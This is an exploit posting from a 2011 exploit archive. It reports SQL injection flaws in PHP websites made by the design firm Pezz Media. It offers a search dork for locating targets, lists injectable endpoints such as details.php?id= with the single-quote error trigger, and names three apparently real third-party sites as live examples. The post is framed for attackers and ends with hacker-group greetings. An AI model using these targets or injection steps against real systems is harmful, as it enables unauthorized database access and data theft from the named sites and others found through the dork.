Pezz Media SQL injection Vulnerability

2011-06-09T00:00:00
ID 1337DAY-ID-16291
Type zdt
Reporter k's0uR!
Modified 2011-06-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit Title : Pezz Media.. SQL injection Vulnerability
[+] Date : 08 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Website designed and maintained by Pezz Media, UK " 
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Exploit:


››http://localhost/path/details.php?id={VaLid id }
[Or]
››http://localhost/path/testimonial.php?id={VaLid id }
[Or]
››http://localhost/path/testimonials.php?id={VaLid id }
[Or]
››http://localhost/path/location.php?id={VaLid id }
[Or]
››http://localhost/path/availability.php?id={VaLid id }

››Check all .php?*= mostly all vul.. to sqli.!
›› use your head..!!

››http://localhost/path/details.php?id=7beecl73d8' » {sql Error}  (^_^)
››http://localhost/path/details.php?id=Sql here 

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Example:

››http://constantinesurf.com/shop/details.php?id=7beecl73d8'
››http://www.ttride.net/org/testimonial.php?id=f49b249855'
››http://www.miggins.net/area/location.php?id=cae886eb46'

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]Greetz To : 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued...



#  0day.today [2018-03-20]  #